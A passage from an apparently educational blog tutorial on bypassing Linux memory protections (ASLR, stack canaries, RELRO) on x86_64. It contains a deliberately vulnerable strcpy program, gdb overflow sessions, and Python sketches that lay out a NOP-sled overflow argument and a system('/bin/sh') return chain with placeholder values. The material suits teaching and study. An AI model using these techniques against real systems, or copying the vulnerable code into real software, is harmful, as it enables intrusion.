fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffed12acfc - 0x7fffa3a4f8f0"
$1 = 1231926284
Using this method, we could fill the buffer with the return address, add a large NOP sled followed by the shellcode after it, and guess an offset that lands in the sled. As you can see, the degree of randomization is not the same, but you can play with that. Of course, this attack is more effective on 32-bit systems and on older kernel versions[9].
If we dig a little bit more, we can reduce the range of possible addresses using the “/proc/self/maps” file (local bypass), as shown below:
00fa8000-00fc9000 rw-p 00000000 00:00 0 [heap]
7ffd77890000-7ffd77a1a000 r-xp 00000000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77a1a000-7ffd77c19000 ---p 0018a000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c19000-7ffd77c1d000 r--p 00189000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c1d000-7ffd77c1e000 rw-p 0018d000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c1e000-7ffd77c24000 rw-p 00000000 00:00 0
7ffd77c24000-7ffd77c26000 r-xp 00000000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77c26000-7ffd77e25000 ---p 00002000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e25000-7ffd77e26000 r--p 00001000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e26000-7ffd77e27000 rw-p 00002000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e27000-7ffd77e48000 r-xp 00000000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7ffd7801d000-7ffd78020000 rw-p 00000000 00:00 0
7ffd78043000-7ffd78044000 rw-p 00000000 00:00 0
7ffd78045000-7ffd78047000 rw-p 00000000 00:00 0
7ffd78047000-7ffd78048000 r--p 00020000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7ffd78048000-7ffd7804a000 rw-p 00021000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7fff7d479000-7fff7d49a000 rw-p 00000000 00:00 0 [stack]
7fff7d589000-7fff7d58a000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Unfortunately, this leak has been partially patched since 2.6.27 according to Julien Tinnes and Tavis Ormandy[10], and these files seem to be protected if you cannot ptrace the pid. However, there was another way, using “/proc/self/stat” and “/proc/self/wchan”, which leak information such as the stack pointer and the instruction pointer (=> ps -eo pid,eip,esp,wchan); by sampling “kstkeip”, we could reconstruct the maps (see fuzzyaslr by Tavis Ormandy[11]).
Brute-forcing is always a very noisy way to get what you want: it takes time, and you should know that every attempt is recorded in logs. The solution may lie in the registers.
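When the maps file is readable, extracting the interesting ranges is straightforward. Here is a small sketch that parses lines in the format shown above; the sample lines are copied from that listing, and parse_maps_line() is a helper name chosen for the example.

```python
SAMPLE = """\
7ffd77890000-7ffd77a1a000 r-xp 00000000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c1e000-7ffd77c24000 rw-p 00000000 00:00 0
7fff7d479000-7fff7d49a000 rw-p 00000000 00:00 0 [stack]
"""


def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into its fields."""
    fields = line.split(None, 5)
    start, end = (int(value, 16) for value in fields[0].split("-"))
    return {
        "start": start,
        "end": end,
        "perms": fields[1],
        "offset": int(fields[2], 16),
        # Anonymous mappings have no path column.
        "path": fields[5].strip() if len(fields) > 5 else "",
    }


regions = [parse_maps_line(line) for line in SAMPLE.splitlines()]
for region in regions:
    size = region["end"] - region["start"]
    print(hex(region["start"]), hex(size), region["perms"], region["path"])
```

On a live system, the same function can be applied to each line of open("/proc/self/maps"), provided the file is readable by the current user.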
Return-to-registers
Using a debugger like GDB can help you find other ways to bypass protections such as DEP, as shown previously, and ASLR of course. To study this case, we will work with a better example:
#include <string.h>

void vuln(char *string)
{
    char buffer[50];
    strcpy(buffer, string); // Guys! It's vulnerable! (no bounds check)
}

int main(int argc, char **argv)
{
    if (argc > 1)
        vuln(argv[1]);
}
By the way, don’t forget to disable the stack protector (compile as follows: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=4 vuln2.c -o vuln2). We will see later what a canary is; for the moment, let’s just focus on ASLR.
After a few tries, we see that we can overwrite the instruction pointer:
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/fluxiux/aslr/vuln2 `python -c 'print "A"*78'`
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Now put a breakpoint on the call to the “vuln()” function and on the return instruction of main:
Dump of assembler code for function main:
0x0000000000400515 <+0>: push %rbp
0x0000000000400516 <+1>: mov %rsp,%rbp
0x0000000000400519 <+4>: sub $0x10,%rsp
0x000000000040051d <+8>: mov %edi,-0x4(%rbp)
0x0000000000400520 <+11>: mov %rsi,-0x10(%rbp)
0x0000000000400524 <+15>: cmpl $0x1,-0x4(%rbp)
0x0000000000400528 <+19>: jle 0x40053d <main+40>
0x000000000040052a <+21>: mov -0x10(%rbp),%rax
0x000000000040052e <+25>: add $0x8,%rax
0x0000000000400532 <+29>: mov (%rax),%rax
0x0000000000400535 <+32>: mov %rax,%rdi
0x0000000000400538 <+35>: callq 0x4004f4 <vuln>
0x000000000040053d <+40>: leaveq
0x000000000040053e <+41>: retq
End of assembler dump.
(gdb) break *0x400538
Breakpoint 1 at 0x400538
(gdb) break *0x000000000040053e
Breakpoint 2 at 0x40053e
After that, put a breakpoint on the return instruction of the “vuln()” function:
Dump of assembler code for function vuln:
0x00000000004004f4 <+0>: push %rbp
0x00000000004004f5 <+1>: mov %rsp,%rbp
0x00000000004004f8 <+4>: sub $0x50,%rsp
0x00000000004004fc <+8>: mov %rdi,-0x48(%rbp)
0x0000000000400500 <+12>: mov -0x48(%rbp),%rdx
0x0000000000400504 <+16>: lea -0x40(%rbp),%rax
0x0000000000400508 <+20>: mov %rdx,%rsi
0x000000000040050b <+23>: mov %rax,%rdi
0x000000000040050e <+26>: callq 0x400400 <strcpy@plt>
0x0000000000400513 <+31>: leaveq
0x0000000000400514 <+32>: retq
End of assembler dump.
(gdb) break *0x0000000000400514
Breakpoint 3 at 0x400514
As we can see, RSP points to the return address:
rsp 0x7fffffffe148 0x7fffffffe148
(gdb) x/20x $rsp - 40
[...]
0x7fffffffe140: 0x00000000 0x00000000 0x0040053d 0x00000000
[…]
The return address has been overwritten (we also noticed that previously):
rsp 0x7fffffffe148 0x7fffffffe148
(gdb) x/20x $rsp - 40
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x00004141
0x7fffffffe150: 0xffffe248 0x00007fff 0x00000000 0x00000002
0x7fffffffe160: 0x00000000 0x00000000 0xf7a66eff 0x00007fff
And when running up to the last breakpoint, we can observe that register RAX points to the beginning of our buffer:
0x00000000004004f8 in vuln ()
(gdb) info reg rax
rax 0x7fffffffe520 140737488348448
(gdb) x/20x $rax - 40
0x7fffffffe4f8: 0x36387816 0x0034365f 0x00000000 0x2f000000
0x7fffffffe508: 0x656d6f68 0x756c662f 0x78756978 0x6c73612f
0x7fffffffe518: 0x75762f72 0x00326e6c 0x41414141 0x41414141
0x7fffffffe528: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe538: 0x41414141 0x41414141 0x41414141 0x41414141
(Note that if you’re not sure, try with this payload: `python -c 'print "A"*70+"B"*8'`).
After that, we look for a valid “jmp/callq *%rax”:
4003cc: e8 6b 00 00 00 callq 40043c <call_gmon_start>
[...]
400604: ff d0 callq *%rax
..
The one at “0x400604” looks great: we just have to replace the junk data (“A”) with a NOP sled and a precious shellcode that fits in the buffer, and overwrite the instruction pointer with the address “0x400604”. On 32-bit, “Sickness” has written a good article about that if you are interested[12].
But as you know, by default on Linux (especially the user-friendly one: Ubuntu), programs are compiled with NX bit support, so you need to be lucky to use this technique on today’s systems. We also used an option to disable the stack protector, but what is it exactly?
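The layout of such an argument can be derived from the disassembly of vuln(): the buffer starts at -0x40(%rbp), so the saved return address sits 0x40 + 8 = 72 bytes after its beginning (which matches the 78 “A” that overwrote six bytes of RIP). The sketch below only illustrates that arithmetic: the single 0xcc byte is a placeholder standing in for real code, and build_argument() is a name invented here.

```python
import struct

BUFFER_TO_RBP = 0x40            # from "lea -0x40(%rbp),%rax" in vuln()
SAVED_RBP_SIZE = 8              # saved %rbp sits between buffer and return address
OFFSET = BUFFER_TO_RBP + SAVED_RBP_SIZE
CALL_RAX = 0x400604             # address of the "callq *%rax" found above


def build_argument(code, sled=16):
    """Lay out [NOP sled][code][padding][address of callq *%rax]."""
    body = b"\x90" * sled + code
    if len(body) > OFFSET:
        raise ValueError("code does not fit before the return address")
    if b"\x00" in body:
        raise ValueError("strcpy() would stop at the first NUL byte")
    padding = b"A" * (OFFSET - len(body))
    # Only the non-zero low bytes are written; the upper bytes of the saved
    # return address are already zero and strcpy() appends one NUL itself.
    ret = struct.pack("<Q", CALL_RAX).rstrip(b"\x00")
    return body + padding + ret


argument = build_argument(b"\xcc")   # placeholder byte (int3), not a shellcode
print(len(argument), argument[OFFSET:])
```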
Stack Canary
Named by analogy with the canary in a coal mine, stack canaries are used to protect against stack overflow attacks. When compiling with the stack protector option (which is used by default), the prologue and epilogue of each function considered dangerous are modified.
If we compile the previous code with the stack protector enabled, we get something like this:
fluxiux@handgrep:~/spp$ ./vuln3
fluxiux@handgrep:~/spp$ ./vuln3 `python -c 'print "A"*76'`
*** stack smashing detected ***: ./vuln3 terminated
Disassembling the “vuln()” function, we can see in the epilogue that a comparison is done:
Dump of assembler code for function vuln:
[...]
0x000000000040058d <+41>: callq 0x400470 <strcpy@plt>
0x0000000000400592 <+46>: mov -0x8(%rbp),%rdx
0x0000000000400596 <+50>: xor %fs:0x28,%rdx
0x000000000040059f <+59>: je 0x4005a6 <vuln+66>
0x00000000004005a1 <+61>: callq 0x400460 <__stack_chk_fail@plt>
0x00000000004005a6 <+66>: leaveq
[...]
If the value in “%fs:0x28” is the same as in “%rdx”, the XOR gives zero and the “vuln()” function ends properly. Otherwise, the function “__stack_chk_fail()” is called and an error message shows up (“*** stack smashing detected ***: ./vuln3 terminated”).
Putting a breakpoint on the call to “__stack_chk_fail()”, we can observe the values at $RSP:
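The logic of this epilogue can be modeled in a few lines of Python. This is only a sketch: the frame layout (a 56-byte area followed by an 8-byte cookie), the cookie value and the helper names are assumptions chosen for illustration, and `strcpy_like` merely imitates an unbounded string copy.

```python
BUF_SIZE = 56                  # assumed distance from the buffer start to the cookie
COOKIE = 0xE3B6079ABF630000    # hypothetical reference value (what %fs:0x28 would hold)


def new_frame():
    """Buffer followed by the 8-byte cookie, stored little-endian."""
    return bytearray(BUF_SIZE) + bytearray(COOKIE.to_bytes(8, "little"))


def strcpy_like(frame, data):
    """Unbounded copy: writes data plus a terminating NUL, ignoring BUF_SIZE."""
    src = data.split(b"\x00", 1)[0] + b"\x00"
    frame[:len(src)] = src


def epilogue_ok(frame):
    """Mimics: mov -0x8(%rbp),%rdx ; xor %fs:0x28,%rdx ; je <normal return>."""
    saved = int.from_bytes(frame[BUF_SIZE:BUF_SIZE + 8], "little")
    return (saved ^ COOKIE) == 0   # zero result: the je is taken


for n in (10, 57):
    frame = new_frame()
    strcpy_like(frame, b"A" * n)
    print(n, "returns normally" if epilogue_ok(frame) else "__stack_chk_fail()")
```

With 10 bytes the cookie is untouched and the function returns; with 57 bytes the copy spills into the cookie and the check fails.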
Starting program: /home/fluxiux/aslr/vuln3 `python -c 'print "A"*57'`
Breakpoint 1, 0x00000000004005cb in main ()
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004005a1 in vuln ()
(gdb) x/30x $rsp
0x7fffffffe100: 0x00000000 0x00000000 0xffffe535 0x00007fff
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0xbf630041 0xe3b6079a
0x7fffffffe150: 0xffffe170 0x00007fff 0x004005d0 0x00000000
0x7fffffffe160: 0xffffe258 0x00007fff 0x00000000 0x00000002
0x7fffffffe170: 0x00000000 0x00000000
At “0x7fffffffe148”, we have overwritten 1 byte of the stack cookie saved on the stack (that is why breakpoint 2 stopped on the call to __stack_chk_fail()). At “0x7fffffffe158”, we see the return address into main(). So the structure of this canary should look like figure 3.
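The distances involved can be checked with a little arithmetic on the addresses read from the dump above. The interpretation of each word (cookie, saved RBP, return address) is our reading of the dump, written here as a short Python sketch.

```python
# Addresses read from the gdb dump above.
BUFFER_START = 0x7FFFFFFFE110   # first 0x41414141 word
COOKIE_ADDR = 0x7FFFFFFFE148    # word 0xbf630041: cookie with its low byte overwritten
SAVED_RBP = 0x7FFFFFFFE150      # holds 0x00007fffffffe170
RETURN_ADDR = 0x7FFFFFFFE158    # holds 0x00000000004005d0, back into main()

offsets = {
    "cookie": COOKIE_ADDR - BUFFER_START,
    "saved_rbp": SAVED_RBP - BUFFER_START,
    "return_address": RETURN_ADDR - BUFFER_START,
}
for name, off in offsets.items():
    print(f"{name:15s} buffer + {off}")

# 57 "A" bytes therefore reach exactly one byte into the cookie.
assert 57 - offsets["cookie"] == 1
```

So the cookie sits 56 bytes after the start of the copied data, immediately below the saved RBP and the return address.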
There are 3 kinds of canaries:
- Null (0x0),
- terminator (built from bytes that stop string functions, such as “\x00”, “\x0a” and “\xff”),
- random.
The first 2 kinds are easy to bypass[14], because you just have to fill the buffer with your shellcode, place the expected value at the right position and overwrite the instruction pointer. The random one is a little more fun, because you have to guess its value at each execution (Ow! A bit like ASLR?).
For random canaries, “__guard_setup()” fills a global variable with random bytes read from “/dev/urandom”, if possible. Later in the program, only 4 or 8 bytes (depending on the architecture) are used as the cookie. But if the entropy of “/dev/urandom” cannot be used, we get a terminator or a null cookie by default.
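The behaviour described above can be sketched as follows in Python. This is not the real library code: the function names, the injectable `random_source` parameter and the exact byte positions of the terminator fallback are assumptions made for the illustration.

```python
import os

WORD_SIZE = 8   # 8 bytes on x86_64, 4 on 32-bit x86


def setup_guard(random_source=os.urandom, word_size=WORD_SIZE):
    """Return a cookie: random if entropy is available, terminator otherwise."""
    try:
        cookie = bytearray(random_source(word_size))
        if len(cookie) != word_size:
            raise OSError("short read")
    except (OSError, NotImplementedError):
        # Fallback: terminator-style cookie (NUL, newline, 0xff); assumed layout.
        cookie = bytearray(word_size)
        cookie[0] = 0x00
        cookie[-2] = 0x0A
        cookie[-1] = 0xFF
    return bytes(cookie)


def broken_source(_n):
    """Hypothetical entropy source that always fails."""
    raise OSError("no entropy available")


print(setup_guard().hex())
print(setup_guard(broken_source).hex())
```

The second call shows why the fallback is weaker: its value is fixed, so an attacker who can write those bytes knows the cookie in advance.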
Brute-force is one way, but it takes too much time. By overwriting further than the return address, we can hook the execution flow using GOT entries. The canary will of course detect the corruption, but too late. A very good article covering StackGuard and StackShield explains four ways to bypass these protections[15].
However, on new kernels you also have to notice that the random cookie is set with a null byte at the end, so trying to recover the value by forking or brute-forcing will not work with functions like “strcpy”. So the best way is to gain control of the initialized cookie.
Format string vulnerabilities or heap overflows, for example, are easier to exploit in the presence of this protection, but this article is not finished yet and we will now see another memory corruption mitigation technique.
RELRO
In recent Linux distributions, a memory corruption mitigation technique has been introduced to harden the data sections of binaries/processes. This protection can be seen by reading the program headers (with readelf for example):
[...]
Program Headers:
[...]
GNU_RELRO 0x0000000000000e28 0x0000000000600e28 0x0000000000600e28
0x00000000000001d8 0x00000000000001d8 R 1
On current Linux, your binaries are often compiled with RELRO. That means that the following sections are mapped as read-only:
Optionally, you can compare with the dissection of a non-RELRO binary, as follows:
[…]
LOAD 0x0000000000000768 0x0000000000600768 0x0000000000600768
0x0000000000000200 0x0000000000000210 RW 200000
[…]
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
[...]
The exploitation of a format string bug, for example, using the format parameter “%n” to write to an arbitrary address such as a GOT entry, is supposed to fail. But as we noticed previously, the PLT GOT has “write” permissions, so we are facing a partial RELRO only.
With the example in trapkit’s article about RELRO[16], we can see that it is very easy to overwrite a GOT entry used by the PLT. But in some cases (mostly in distribution packages), binaries are compiled with full RELRO:
[..]
fluxiux@handgrep:~/relro$ readelf -l ./fullrelro | grep "RELRO"
GNU_RELRO 0x0000000000000df8 0x0000000000600df8 0x0000000000600df8
fluxiux@handgrep:~/relro$ readelf -d ./fullrelro | grep "BIND"
0x0000000000000018 (BIND_NOW)
Note: BIND_NOW indicates that the binary is using full-RELRO.
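The two readelf checks above can be combined into a small classifier. The sketch below is a heuristic in Python that only looks for the “GNU_RELRO” and “BIND_NOW” strings in text already captured from `readelf -l` and `readelf -d`; the function name is ours, and other readelf versions may print the flag differently.

```python
def classify_relro(program_headers, dynamic_section):
    """Classify from the text printed by `readelf -l` and `readelf -d`."""
    has_relro = "GNU_RELRO" in program_headers
    binds_now = "BIND_NOW" in dynamic_section
    if not has_relro:
        return "no RELRO"
    return "full RELRO" if binds_now else "partial RELRO"


# Sample lines copied from the readelf outputs shown above.
relro_header = "GNU_RELRO 0x0000000000000df8 0x0000000000600df8 0x0000000000600df8"
load_header = "LOAD 0x0000000000000768 0x0000000000600768 0x0000000000600768"
dynamic = "0x0000000000000018 (BIND_NOW)"

print(classify_relro(relro_header, dynamic))
print(classify_relro(relro_header, ""))
print(classify_relro(load_header, ""))
```

A GNU_RELRO segment without BIND_NOW leaves the lazily resolved GOT entries writable, which is the partial case discussed above.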
The entire GOT is remapped as read-only, but there are other sections to write to. GOT entries are mostly used for their flexibility. A detour through “.dtors” can be performed, as Sebastian Krahmer described in his article about RELRO[17].
We have seen the common Linux protections used by default, but the evolution of kernels and architectures has made things more difficult.
The x86_64 fact and current systems hardening
With time, new versions of Linux distributions have become well hardened by default. In my studies, Ubuntu surprised me a lot because, in addition to these protections implemented by default, this system tends to adopt some OpenBSD solutions to be as user-friendly and secure as possible. Moreover, we have seen a few protections and ways to bypass them, but 64-bit brings other difficulties.
As you noticed, addresses have changed and it is more difficult to exploit some memory corruptions because of the byte “\x00”, treated as a string terminator by functions like “strcpy()”. We saw that NX is enabled and that gcc compiles with its support by default. But the worst is yet to come. Indeed, we know that the randomization space is larger, but what interests us is the System V ABI for x86_64[8].
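To make the “\x00” problem concrete, here is a small Python sketch comparing a 64-bit and a 32-bit address once packed in little-endian order. The 64-bit address is the 0x400604 seen earlier; the 32-bit stack address and the helper name are hypothetical.

```python
import struct


def copied_by_strcpy(src):
    """Bytes a C string copy would write: everything before the first NUL, plus a NUL."""
    return src.split(b"\x00", 1)[0] + b"\x00"


addr64 = struct.pack("<Q", 0x400604)      # address seen in the disassembly earlier
addr32 = struct.pack("<I", 0xBFFFF6C0)    # hypothetical 32-bit stack address

trailer = b"B" * 8                         # data an attacker would like to place after it
print(addr64.hex(), len(copied_by_strcpy(addr64 + trailer)))
print(addr32.hex(), len(copied_by_strcpy(addr32 + trailer)))
```

On 64-bit the copy stops inside the address itself, so nothing placed after it reaches the stack; on 32-bit the whole sequence goes through.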
Things have changed for function parameters. Indeed, instead of pushing parameters onto the stack, the first 6 integer arguments and the first 8 float/double/vector arguments are passed in registers, and the rest go on the stack. Here is an example:
#include <immintrin.h>  /* __m256 (compile with -mavx) */

typedef struct {
    int a, b;
    double d;
} structparm;

structparm s;
int e, f, g, h, i, j, k;
long double ld;
double m, n;
__m256 y;

extern void func(int e, int f,
                 structparm s, int g, int h,
                 long double ld, double m,
                 __m256 y,
                 double n, int i, int j, int k);

/* The call has to live inside a function to be valid C. */
void caller(void)
{
    func(e, f, s, g, h, ld, m, y, n, i, j, k);
}
The given register allocation looks like this (in figure 4):
Figure 4 – Register allocation example
(source: System V ABI x86_64)
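The allocation for the call above can be reproduced with a simplified model of the ABI rules, sketched here in Python. The per-argument classes are written by hand, `__m256` is counted as a single vector register, and stack offsets are not computed: these are simplifications of ours, not the full classification algorithm of the specification.

```python
INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]
SSE_REGS = [f"xmm{i}" for i in range(8)]


def allocate(args):
    """args: list of (name, [class per eightbyte]); classes: INTEGER, SSE, MEMORY."""
    ints, sses, placement = list(INT_REGS), list(SSE_REGS), {}
    for name, classes in args:
        need_int = classes.count("INTEGER")
        need_sse = classes.count("SSE")
        # An argument goes to the stack if it is MEMORY class or if the
        # remaining registers cannot hold all of its eightbytes.
        if "MEMORY" in classes or need_int > len(ints) or need_sse > len(sses):
            placement[name] = ["stack"]
            continue
        placement[name] = [ints.pop(0) if c == "INTEGER" else sses.pop(0)
                           for c in classes]
    return placement


call = [
    ("e", ["INTEGER"]), ("f", ["INTEGER"]),
    ("s", ["INTEGER", "SSE"]),   # int a, b share one eightbyte; double d is the next
    ("g", ["INTEGER"]), ("h", ["INTEGER"]),
    ("ld", ["MEMORY"]),          # long double (x87 class) is passed in memory
    ("m", ["SSE"]),
    ("y", ["SSE"]),              # __m256 modeled as one vector register (its ymm alias)
    ("n", ["SSE"]),
    ("i", ["INTEGER"]), ("j", ["INTEGER"]), ("k", ["INTEGER"]),
]
result = allocate(call)
for name, where in result.items():
    print(f"{name:3s} -> {', '.join(where)}")
```

Note how `i` still gets the last integer register (r9) although it comes after several floating-point arguments, while `j` and `k` fall back to the stack.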
I suggest you read Jon Larimer’s slides “Intro to x64 Reversing”[18].
The “borrowed code chunks” article[19] helps to understand the problems raised by NX and by the differences between the System V x86_64 ABI and 32-bit x86, and shows ways to bypass them: borrow instructions that load a value into a register, then call a function such as “system()”, which takes its parameter from that register.
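As a rough illustration of that idea, the stack layout for one borrowed chunk could be built like this in Python. Every address and the offset below are hypothetical placeholders, not values from a real binary or libc, and the chunk is assumed to be a “pop %rdi ; retq” sequence.

```python
import struct

# All values below are hypothetical placeholders for illustration only.
POP_RDI_RET = 0x4006A3          # address of a "pop %rdi ; retq" chunk
BIN_SH = 0x7FFFF7B99D57         # address of a "/bin/sh" string
SYSTEM = 0x7FFFF7A52390         # address of system()
OFFSET_TO_RIP = 72              # assumed distance from buffer start to saved RIP


def q(value):
    """Pack a 64-bit little-endian word."""
    return struct.pack("<Q", value)


chain = b"A" * OFFSET_TO_RIP
chain += q(POP_RDI_RET)   # 1. the function returns into the borrowed chunk
chain += q(BIN_SH)        # 2. popped into %rdi, the first integer argument
chain += q(SYSTEM)        # 3. the chunk's retq then jumps to system()

print(len(chain), chain.count(b"\x00"))
```

The NUL bytes counted at the end are the reason such a chain cannot be delivered through “strcpy()” as-is, and ASLR makes the library addresses unpredictable, so both constraints have to be solved separately.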
Other sophisticated attacks, like Return-Oriented Programming, are used to bypass these protections that make life difficult during exploit development.
As you could see, protections do not make things impossible, just harder and harder. So stay aware of newly applied protections and conventions to avoid wasting too much time.
References & Acknowledgements
[1] ELF HOWTO – http://cs.mipt.ru/docs/comp/eng/os/linux/howto/howto_english/elf/elf-howto-1.html
[2] Tool Interface Standard (TIS) Executable and Linking Format (ELF) Specification
[3] Working with the ELF Program Format – http://www.ouah.org/RevEng/x430.htm
[4] Executable_and_Linkable_Format#Applications – http://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Applications
[5] elf.h: ELF types, structures, and macros – http://sourceware.org/git/?p=glibc.git;a=blob_plain;f=elf/elf.h
[6] The ELF Object File Format by Dissection – http://www.linuxjournal.com/article/1060
[7] Smashing the stack for fun and Profit – http://www.phrack.org/issues.html?issue=49&id=14#article
[8] System V Application Binary Interface on x86-64 – http://www.x86-64.org/documentation/abi.pdf
[9] Hacking – The art of exploitation (by Jon Erickson)
[10] Local bypass of Linux ASLR through /proc information leaks – http://blog.cr0.org/2009/04/local-bypass-of-linux-aslr-through-proc.html
[11] Fuzzy ASLR – http://code.google.com/p/fuzzyaslr/
[12] ASLR bypass using ret2reg – http://www.exploit-db.com/download_pdf/17049
[13] /dev/urandom – http://en.wikipedia.org/wiki//dev/urandom
[14] Stack Smashing Protector (FreeBSD) – http://www.hackitoergosum.org/2010/HES2010-prascagneres-Stack-Smashing-Protector-in-FreeBSD.pdf
[15] Four different tricks to bypass StackShield and StackGuard protection – http://www.coresecurity.com/files/attachments/StackguardPaper.pdf
[16] RELRO: not so well known memory – http://tk-blog.blogspot.com/2009/02/relro-not-so-well-known-memory.html
[17] RELRO by Sebastian Krahmer – http://www.suse.de/%7Ekrahmer/relro.txt
[18] Intro to x64 reversing – http://lolcathost.org/b/introx86.pdf
[19] x86-64 buffer overflow exploits and the borrowed code chunks – http://www.suse.de/~krahmer/no-nx.pdf